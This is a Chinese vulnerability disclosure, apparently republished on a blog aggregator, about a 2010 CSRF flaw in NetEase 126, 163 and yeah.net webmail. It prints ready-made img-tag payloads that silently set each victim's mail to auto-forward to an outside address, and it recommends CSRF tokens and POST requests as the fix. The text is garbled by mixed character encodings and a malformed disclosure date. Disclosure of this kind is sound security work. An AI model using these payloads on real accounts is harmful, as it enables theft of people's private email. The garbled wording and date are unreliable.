网易邮箱CSRF漏洞
漏洞詳情
披露情況:
2010-07-07-07-01-2007 細(xì)節(jié)已通知
2010-08-18: 細(xì)節(jié)向公眾公開
簡要描述:
網(wǎng)易存在 CSRF 漏洞,成功攻擊可能會給用戶帶來多種數(shù)據(jù)。
詳細(xì)說明:
網(wǎng)易126郵箱存在CSRF漏洞,攻擊者一個發(fā)給126的郵箱,在郵件中需要用戶嵌入一個自動攻擊的圖片,用戶只要打開該郵件,就可以在郵箱中設(shè)置只發(fā)送給用戶的郵箱。
<img src="http://config.mail.126.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http:// config.mail.163.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw /fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
漏洞證明:
<img src="http://config.mail.126.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http:// config.mail.163.com/autofw/fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
<img src="http://config.mail.yeah.net/autofw /fwto.do?forwarddes=mailxss@ymail.com&keeplocal=1&callback=MM.autofwd.valCallback" />
修復(fù)方案:
1.建議添加CSRF Token。
2.修改提交方式GET為POST。
總結(jié)
以上是生活随笔為你收集整理的网易邮箱CSRF漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 使用自定义线程池处理并行数据库流
- 下一篇: 使用Cloudformation集成Sp